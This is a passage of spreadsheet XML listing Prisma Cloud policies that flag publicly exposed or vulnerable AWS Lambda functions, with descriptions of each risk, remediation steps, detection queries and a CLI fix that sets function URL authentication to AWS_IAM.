        </is>
      </c>
      <c r="O1998" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1998" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1998" t="inlineStr"/>
      <c r="R1998" t="inlineStr"/>
      <c r="S1998" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1998" t="b">
        <v>0</v>
      </c>
      <c r="U1998" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1998" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1998" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda functions that have Spring4Shell vulnerabilities and are publicly exposed. 
Spring4Shell vulnerability is very critical and can compromise the confidentiality, integrity, and availability of data managed by a vulnerable application. The fact that the Lambda function is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Spring4Shell vulnerabilities [CVE-2022-22965 and CVE-2022-22963] and public exposure reported for the Lambda function as soon as possible.</t>
        </is>
      </c>
      <c r="X1998"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1998" t="inlineStr"/>
      <c r="Z1998" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda') AND with : (Vuln WHERE id IN ('CVE-2022-22963', 'CVE-2022-22965'))</t>
        </is>
      </c>
      <c r="AA1998" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1998" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1998" t="inlineStr"/>
      <c r="AD1998" t="b">
        <v>1</v>
      </c>
      <c r="AE1998" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1998" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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8" t="inlineStr">
        <is>
          <t>e677d820-5d71-4884-b98c-dfdd456cdd23</t>
        </is>
      </c>
      <c r="AI1998" t="inlineStr">
        <is>
          <t>e68789c5-d0b0-476e-8a08-c96e85b19b2c</t>
        </is>
      </c>
      <c r="AJ1998" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1998" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1999">
      <c r="A1999" t="inlineStr"/>
      <c r="B1999" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1999" s="2" t="inlineStr"/>
      <c r="D1999" t="n">
        <v>1</v>
      </c>
      <c r="E1999" t="n">
        <v>0</v>
      </c>
      <c r="F1999" t="n">
        <v>0</v>
      </c>
      <c r="G1999" t="b">
        <v>1</v>
      </c>
      <c r="H19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1999" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1999" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1999" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to a publicly exposed and unauthenticated AWS Lambda function with wildcard IAM resource access permissions</t>
        </is>
      </c>
      <c r="L1999" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,HIGH_PRIVILEGED_ROLE,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1999" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1999" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1999" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1999" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1999" t="inlineStr"/>
      <c r="R1999" t="inlineStr"/>
      <c r="S1999" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1999" t="b">
        <v>0</v>
      </c>
      <c r="U1999" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1999" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1999" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed through resource based policies with URL AuthType set to NONE.
AuthType determines how Lambda authenticates or authorizes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further help the attackers to perform unauthorized actions in the cloud account.
This policy identifies AWS IAM permissions that contain '*' in the resource section of the policy statement.
Immediate attention is required to configure Lambda function authentication type to AWS_IAM and remove unwanted permissions assigned to the Lambda function. Restrict public exposure reported for the Lambda Function as soon as possible.</t>
        </is>
      </c>
      <c r="X1999" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access
[PERMISSION]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find the role used by the Lambda Function instance
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under 'Permissions policies', find the relevant policy according to the alert details and narrow down the wildcard permissions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t>
        </is>
      </c>
      <c r="Y1999" t="inlineStr"/>
      <c r="Z1999" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda','AWS Lambda Function with IAM wildcard resource access','AWS Lambda function URL AuthType set to NONE')</t>
        </is>
      </c>
      <c r="AA1999" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1999" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:32</t>
        </is>
      </c>
      <c r="AC1999" t="inlineStr"/>
      <c r="AD1999" t="b">
        <v>1</v>
      </c>
      <c r="AE1999" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1999" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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1999" t="inlineStr">
        <is>
          <t>ec53c233-6be3-401a-b9e8-bc1f295627a4</t>
        </is>
      </c>
      <c r="AI1999" t="inlineStr">
        <is>
          <t>e920a3d1-5ace-4fa1-8c11-7c7ded219ab3</t>
        </is>
      </c>
      <c r="AJ1999" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1999" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2000">
      <c r="A2000" t="inlineStr"/>
      <c r="B2000" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2000" s="2" t="inlineStr"/>
      <c r="D2000" t="inlineStr"/>
      <c r="E2000" t="inlineStr"/>
      <c r="F2000" t="inlineStr"/>
      <c r="G2000" t="b">
        <v>1</v>
      </c>
      <c r="H20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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2000" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2000" t="inlineStr">
        <is>
          <t>Server Side Request Forgery (SSRF) risk due to publicly exposed and vulnerable AWS Lambda function [Node.js, CVE-2020-28168]</t>
        </is>
      </c>
      <c r="L2000" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2000" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2000" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2000" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2000" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2000" t="inlineStr"/>
      <c r="R2000" t="inlineStr"/>
      <c r="S2000" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2000" t="b">
        <v>0</v>
      </c>
      <c r="U2000" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2000" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2000" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed and have known exploitable server side request forgery vulnerability [Node.js, CVE-2020-28168].
Server side request forgery vulnerability is a security flaw allowing an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. The fact that the AWS Lambda function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Node.js [CVE-2020-28168] vulnerability and public exposure reported for the AWS Lambda function as soon as possible.</t>
        </is>
      </c>
      <c r="X2000"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2000" t="inlineStr"/>
      <c r="Z2000" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda') AND with : (Vuln WHERE id IN ('CVE-2020-28168'))</t>
        </is>
      </c>
      <c r="AA2000" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2000" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:58</t>
        </is>
      </c>
      <c r="AC2000" t="inlineStr"/>
      <c r="AD2000" t="b">
        <v>1</v>
      </c>
      <c r="AE2000" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2000" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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0" t="inlineStr">
        <is>
          <t>91f0d268-a2d6-4ee7-b6b7-4208e705943a</t>
        </is>
      </c>
      <c r="AI2000" t="inlineStr">
        <is>
          <t>69163e4a-5121-48c3-a6f9-52e620741f88</t>
        </is>
      </c>
      <c r="AJ2000" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2000" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2001">
      <c r="A2001" t="inlineStr"/>
      <c r="B2001" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2001" s="2" t="inlineStr"/>
      <c r="D2001" t="n">
        <v>1</v>
      </c>
      <c r="E2001" t="n">
        <v>0</v>
      </c>
      <c r="F2001" t="n">
        <v>0</v>
      </c>
      <c r="G2001" t="b">
        <v>1</v>
      </c>
      <c r="H20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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2001" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2001" t="inlineStr">
        <is>
          <t>Unauthorized function invocation risk due to a publicly exposed (via resource based policies) and unauthenticated AWS Lambda function</t>
        </is>
      </c>
      <c r="L2001" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2001" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2001" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2001" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2001" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2001" t="inlineStr"/>
      <c r="R2001" t="inlineStr"/>
      <c r="S2001" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2001" t="b">
        <v>0</v>
      </c>
      <c r="U2001" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2001" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2001" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed through resource based policies with URL AuthType set to NONE.
AuthType determines how Lambda authenticates or authorizes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further help the attackers to perform unauthorized actions in the cloud account.
Immediate attention is required to configure Lambda functions authentication type to AWS_IAM and remove unwanted permissions assigned to the Lambda function. Restrict public exposure reported for the Lambda Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2001"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t>
        </is>
      </c>
      <c r="Y2001" t="inlineStr"/>
      <c r="Z2001" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') AND finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE')</t>
        </is>
      </c>
      <c r="AA2001" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2001" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:32</t>
        </is>
      </c>
      <c r="AC2001" t="inlineStr"/>
      <c r="AD2001" t="b">
        <v>1</v>
      </c>
      <c r="AE2001" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2001" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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1" t="inlineStr">
        <is>
          <t>9f2e21de-fe1d-4148-9415-2a1bf6593b39</t>
        </is>
      </c>
      <c r="AI2001" t="inlineStr">
        <is>
          <t>f49d4c3d-e33f-45ce-af7a-8c871dca1806</t>
        </is>
      </c>
      <c r="AJ2001" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2001" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2002">
      <c r="A2002" t="inlineStr"/>
      <c r="B2002" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2002" s="2" t="inlineStr"/>
      <c r="D2002" t="inlineStr"/>
      <c r="E2002" t="inlineStr"/>
      <c r="F2002" t="inlineStr"/>
      <c r="G2002" t="b">
        <v>1</v>
      </c>
      <c r="H20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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2002" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2002" t="inlineStr">
        <is>
          <t>CRLF Injection risk due to publicly exposed and vulnerable AWS Lambda function [Python, CVE-2020-26137]</t>
        </is>
      </c>
      <c r="L2002" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2002" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2002" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2002" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2002" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2002" t="inlineStr"/>
      <c r="R2002" t="inlineStr"/>
      <c r="S2002" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2002" t="b">
        <v>0</v>
      </c>
      <c r="U2002" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2002" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2002" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed and have known exploitable CRLF injection vulnerability [Python, CVE-2020-26137].
CRLF injection vulnerability is a security flaw allowing an attacker to inject a CRLF sequence. The fact that the AWS Lambda function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2020-26137] vulnerability and public exposure reported for the AWS Lambda function as soon as possible.</t>
        </is>
      </c>
      <c r="X2002"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2002" t="inlineStr"/>
      <c r="Z2002" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda') AND with : (Vuln WHERE id IN ('CVE-2020-26137'))</t>
        </is>
      </c>
      <c r="AA2002" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2002" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:58</t>
        </is>
      </c>
      <c r="AC2002" t="inlineStr"/>
      <c r="AD2002" t="b">
        <v>1</v>
      </c>
      <c r="AE2002" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2002" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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2" t="inlineStr">
        <is>
          <t>65d50aa8-7f45-4e9e-a6ad-15c2d8286823</t>
        </is>
      </c>
      <c r="AI2002" t="inlineStr">
        <is>
          <t>fd7ba61b-a46d-40ea-8f44-13750d622f89</t>
        </is>
      </c>
      <c r="AJ2002" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2002" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2003">
      <c r="A2003" t="inlineStr"/>
      <c r="B2003" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2003" s="2" t="inlineStr"/>
      <c r="D2003" t="inlineStr"/>
      <c r="E2003" t="inlineStr"/>
      <c r="F2003" t="inlineStr"/>
      <c r="G2003" t="b">
        <v>1</v>
      </c>
      <c r="H20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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2003" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2003" t="inlineStr">
        <is>
          <t>Unauthorized access and abuse of a vulnerable AWS Lambda function that is accessible through resource based policies</t>
        </is>
      </c>
      <c r="L2003" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2003" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2003" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2003" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2003" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2003" t="inlineStr"/>
      <c r="R2003" t="inlineStr"/>
      <c r="S2003" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2003" t="b">
        <v>0</v>
      </c>
      <c r="U2003" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2003" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2003" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda which are publicly exposed through resource based policies and have critical or high vulnerabilities
Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected AWS Lambda, enabling them to perform malicious actions. The public exposure of these vulnerable AWS Lambda makes them an easy target for attacks.
Immediate attention is needed to remediate the critical and high vulnerabilities and public exposure reported for the AWS Lambda.</t>
        </is>
      </c>
      <c r="X2003" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access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003" t="inlineStr"/>
      <c r="Z2003" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') AND finding.name IN ('Publicly Executable Lambda') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2003" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2003" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2003" t="inlineStr"/>
      <c r="AD2003" t="b">
        <v>1</v>
      </c>
      <c r="AE2003" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2003" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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3" t="inlineStr">
        <is>
          <t>7cbdd249-2a2b-42f8-aaae-b0d719912037</t>
        </is>
      </c>
      <c r="AI2003" t="inlineStr">
        <is>
          <t>2a12ede7-15cb-46ad-adec-a5faafba946d</t>
        </is>
      </c>
      <c r="AJ2003" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2003" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2004">
      <c r="A2004" t="inlineStr"/>
      <c r="B2004" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2004" s="2" t="inlineStr"/>
      <c r="D2004" t="inlineStr"/>
      <c r="E2004" t="inlineStr"/>
      <c r="F2004" t="inlineStr"/>
      <c r="G2004" t="b">
        <v>1</v>
      </c>
      <c r="H20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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2004" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2004" t="inlineStr">
        <is>
          <t>Data exposure and data loss risk due to a publicly exposed unauthenticated AWS Lambda function with permissions over sensitive S3 configuration</t>
        </is>
      </c>
      <c r="L2004" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2004" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2004" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2004" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2004" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2004" t="inlineStr"/>
      <c r="R2004" t="inlineStr"/>
      <c r="S2004" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2004" t="b">
        <v>0</v>
      </c>
      <c r="U2004" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2004" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2004" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed through resource based policies with URL AuthType set to NONE and have permissions over sensitive S3 configuration.
AuthType determines how Lambda authenticates or authorises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with access to modify S3 configuration can lead to data loss or data exposure.
This policy checks for the following write permissions over security groups:
's3:PutObjectRetention', 's3:PutLifecycleConfiguration' ,'s3:PutBucketPolicy' ,'s3:PutBucketVersioning'
Immediate attention is required to configure Lambda function authentication type to AWS_IAM and grant only the least privileges required and remove unwanted permissions assigned to the Lambda function. Restrict public exposure reported for the Lambda Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2004"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2004" t="inlineStr"/>
      <c r="Z2004" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE','AWS Lambda with write permission on critical configuration for s3')</t>
        </is>
      </c>
      <c r="AA2004" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2004" t="inlineStr">
        <is>
          <t>2023-09-29 05:49:21</t>
        </is>
      </c>
      <c r="AC2004" t="inlineStr"/>
      <c r="AD2004" t="b">
        <v>1</v>
      </c>
      <c r="AE2004" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2004" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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4" t="inlineStr">
        <is>
          <t>466bdecd-2090-4f37-8ee3-2dd0e8de0573</t>
        </is>
      </c>
      <c r="AI2004" t="inlineStr">
        <is>
          <t>0efeb688-f2d9-4361-9530-c4cf7a38156a</t>
        </is>
      </c>
      <c r="AJ2004" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2004" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2005">
      <c r="A2005" t="inlineStr">
        <is>
          <t>HIPAA, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, SOC 2, ITSG-33, Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2022.2.1</t>
        </is>
      </c>
      <c r="B2005" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2005" s="2" t="inlineStr"/>
      <c r="D2005" t="inlineStr"/>
      <c r="E2005" t="inlineStr"/>
      <c r="F2005" t="inlineStr"/>
      <c r="G2005" t="b">
        <v>1</v>
      </c>
      <c r="H20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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2005" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2005" t="inlineStr">
        <is>
          <t>AWS Lambda function URL AuthType set to NONE</t>
        </is>
      </c>
      <c r="L2005" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2005" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2005" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2005" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2005" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2005" t="inlineStr">
        <is>
          <t>Identification &amp; Authentication</t>
        </is>
      </c>
      <c r="R2005" t="inlineStr">
        <is>
          <t>IAC-01</t>
        </is>
      </c>
      <c r="S2005" t="inlineStr">
        <is>
          <t>Attack Path Rule,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2005" t="b">
        <v>1</v>
      </c>
      <c r="U2005" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2005" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2005" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda functions which have function URL AuthType set to NONE. AuthType determines how Lambda authenticates or authorises requests to your function URL. When AuthType is set to NONE, Lambda doesn't perform any authentication before invoking your function. It is highly recommended to set AuthType to AWS_IAM for Lambda function URL to authenticate via AWS IAM.</t>
        </is>
      </c>
      <c r="X2005" t="inlineStr">
        <is>
          <t>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Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-authtype-for-your-lambda-function-urls-is-defined
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-authtype-for-your-lambda-function-urls-is-defined</t>
        </is>
      </c>
      <c r="Y2005" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'lambda:UpdateFunctionUrlConfig' permission. Successful execution will set AuthType to AWS_IAM for AWS Lambda function URL.",
'impact': "Set 'AuthType' setting to AWS_IAM for AWS Lambda function URL",
'cliScriptTemplate': 'aws lambda update-function-url-config --function-name $resourceId --region $region --auth-type AWS_IAM'</t>
        </is>
      </c>
      <c r="Z2005" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-lambda-list-functions' AND json.rule = authType equal ignore case NONE
{"category":"General","resourceTypes":["aws_lambda_function_url", "AWS::Lambda::Url"]}</t>
        </is>
      </c>
      <c r="AA2005" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2005" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2005" t="inlineStr">
        <is>
          <t>PC-AWS-LMB-925-CKV_AWS_258</t>
        </is>
      </c>
      <c r="AD2005" t="b">
        <v>1</v>
      </c>
      <c r="AE2005" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2005" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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5" t="inlineStr">
        <is>
          <t>d80b48e4-f9de-4d75-ac4c-296169303d92</t>
        </is>
      </c>
      <c r="AI2005" t="inlineStr">
        <is>
          <t>92a3fce2-0875-49da-af5c-71c3366100bf</t>
        </is>
      </c>
      <c r="AJ2005" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2005" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2006">
      <c r="A2006" t="inlineStr"/>
      <c r="B2006" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2006" s="2" t="inlineStr"/>
      <c r="D2006" t="inlineStr"/>
      <c r="E2006" t="inlineStr"/>
      <c r="F2006" t="inlineStr"/>
      <c r="G2006" t="b">
        <v>1</v>
      </c>
      <c r="H20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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2006" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2006" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable AWS Lambda function [Java Spring Framework, CVE-2021-22119]</t>
        </is>
      </c>
      <c r="L2006" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2006" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2006" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2006" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2006" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2006" t="inlineStr"/>
      <c r="R2006" t="inlineStr"/>
      <c r="S2006" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2006" t="b">
        <v>0</v>
      </c>
